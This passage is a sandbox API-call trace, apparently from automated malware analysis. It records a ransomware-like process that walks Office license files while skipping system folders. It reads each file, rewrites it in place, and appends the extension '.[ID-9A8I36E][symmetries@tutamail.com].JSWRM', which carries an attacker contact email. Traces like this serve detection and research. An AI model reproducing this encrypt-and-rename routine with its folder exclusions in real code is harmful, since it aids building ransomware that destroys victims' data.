RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0102.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0102.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0102.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0102.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0102.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0102.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0102.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0102.741] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_oem_perp-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_OEM_Perp-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_oem_perp-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0102.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0102.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0102.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0102.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0102.743] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3594a6c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3594a6c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3a595e5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d3e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ExcelR_OEM_Perp-ul-oob.xrm-ms", cAlternateFileName="EX3475~1.XRM")) returned 1 [0102.743] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ul-oob.xrm-ms", lpString2=".") returned 1 [0102.743] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ul-oob.xrm-ms", lpString2="..") returned 1 [0102.743] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ul-oob.xrm-ms", lpString2="...") returned 1 [0102.743] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ul-oob.xrm-ms", lpString2="windows") returned -1 [0102.743] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0102.743] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0102.743] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0102.743] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.743] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0102.743] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0102.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0102.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0102.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x240f20, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0102.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0102.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0102.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2412e0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0102.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0102.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0102.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0102.743] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_oem_perp-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.744] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11582) returned 1 [0102.744] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d30) returned 0x24c1d0 [0102.744] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d30, lpOverlapped=0x0) returned 1 [0102.746] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.746] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d30, lpOverlapped=0x0) returned 1 [0102.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.746] CloseHandle (hObject=0x45c) returned 1 [0102.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0102.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0102.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0102.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0102.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0102.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0102.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.747] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_oem_perp-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_OEM_Perp-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_oem_perp-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0102.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0102.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0102.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0102.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0102.748] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3332528, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3332528, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe34afc59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dd7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ExcelR_OEM_Perp-ul-phn.xrm-ms", cAlternateFileName="EXD89F~1.XRM")) returned 1 [0102.748] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ul-phn.xrm-ms", lpString2=".") returned 1 [0102.748] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ul-phn.xrm-ms", lpString2="..") returned 1 [0102.748] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ul-phn.xrm-ms", lpString2="...") returned 1 [0102.748] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ul-phn.xrm-ms", lpString2="windows") returned -1 [0102.748] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0102.748] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0102.748] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0102.748] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.748] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0102.748] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ul-phn.xrm-ms", lpString2="msocache") returned -1 [0102.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0102.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0102.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241268, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0102.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0102.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0102.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241308, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0102.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0102.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0102.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0102.749] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_oem_perp-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.749] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19927) returned 1 [0102.749] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dd0) returned 0x24c1d0 [0102.749] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dd0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dd0, lpOverlapped=0x0) returned 1 [0102.752] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.752] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4dd0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dd0, lpOverlapped=0x0) returned 1 [0102.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.752] CloseHandle (hObject=0x45c) returned 1 [0102.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0102.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0102.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0102.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0102.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0102.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0102.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0102.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0102.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.753] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_oem_perp-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_OEM_Perp-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_oem_perp-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0102.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0102.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0102.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0102.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0102.754] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe330c311, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe330c311, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe34172f7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2983, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ExcelR_Retail-pl.xrm-ms", cAlternateFileName="EX3998~1.XRM")) returned 1 [0102.754] lstrcmpiW (lpString1="ExcelR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0102.754] lstrcmpiW (lpString1="ExcelR_Retail-pl.xrm-ms", lpString2="..") returned 1 [0102.754] lstrcmpiW (lpString1="ExcelR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0102.754] lstrcmpiW (lpString1="ExcelR_Retail-pl.xrm-ms", lpString2="windows") returned -1 [0102.754] lstrcmpiW (lpString1="ExcelR_Retail-pl.xrm-ms", lpString2="recovery") returned -1 [0102.754] lstrcmpiW (lpString1="ExcelR_Retail-pl.xrm-ms", lpString2="perflogs") returned -1 [0102.754] lstrcmpiW (lpString1="ExcelR_Retail-pl.xrm-ms", lpString2="documents and settings") returned 1 [0102.754] lstrcmpiW (lpString1="ExcelR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.754] lstrcmpiW (lpString1="ExcelR_Retail-pl.xrm-ms", lpString2="system volume information") returned -1 [0102.754] lstrcmpiW (lpString1="ExcelR_Retail-pl.xrm-ms", lpString2="msocache") returned -1 [0102.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Retail-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0102.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0102.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Retail-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x2413d0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0102.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Retail-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0102.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0102.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Retail-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x240fe8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0102.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0102.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0102.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0102.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.755] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10627) returned 1 [0102.755] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.755] RtlAllocateHeap 